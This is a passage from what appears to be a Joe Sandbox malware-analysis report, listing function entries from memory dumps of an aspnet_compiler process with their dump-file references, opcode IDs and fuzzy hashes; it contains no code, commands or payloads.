                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction ID: 9c2b4f45b28cc86ef7e88fbfa013824e6e3d6d7d290b489a0ce1ca5bbbc6060e
                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction Fuzzy Hash: C2F05E72240204DFCB1CCF05C490FB9B7B6AB80715F29412CE50B8F691D7359841C654
                                                    Function 00A600EA Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5724fe83a71347ee338c5d11ee4899e9d0a0d43679a2b0ac7d781f4b181be389
                                                    • Instruction ID: 8521d8f46b2a2568e99279b7ac5bdaf64510d78d27e7360a1d79d4deb14ad3df
                                                    • Opcode Fuzzy Hash: 5724fe83a71347ee338c5d11ee4899e9d0a0d43679a2b0ac7d781f4b181be389
                                                    • Instruction Fuzzy Hash: 6BE06572548A808FC310DF149A00B1AB3F8FB88B10F11083AE40587A50D7689A048952
                                                    Function 00A700C4 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Function 00A70060 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                    Function 00A70078 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                    Function 00A70048 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                    Function 00A701D4 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                    Function 00A7010C Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                    Function 00A70C40 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                    • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                    • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                    • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                    Function 00A710D0 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                    Function 00A71148 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                    Function 00A6F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                    Function 00A71930 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                    • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                    Function 00A6F938 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                    • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                    Function 00A6F900 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Function 00A6FAB8 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                    Function 00A6FAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                    Function 00A6FA20 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
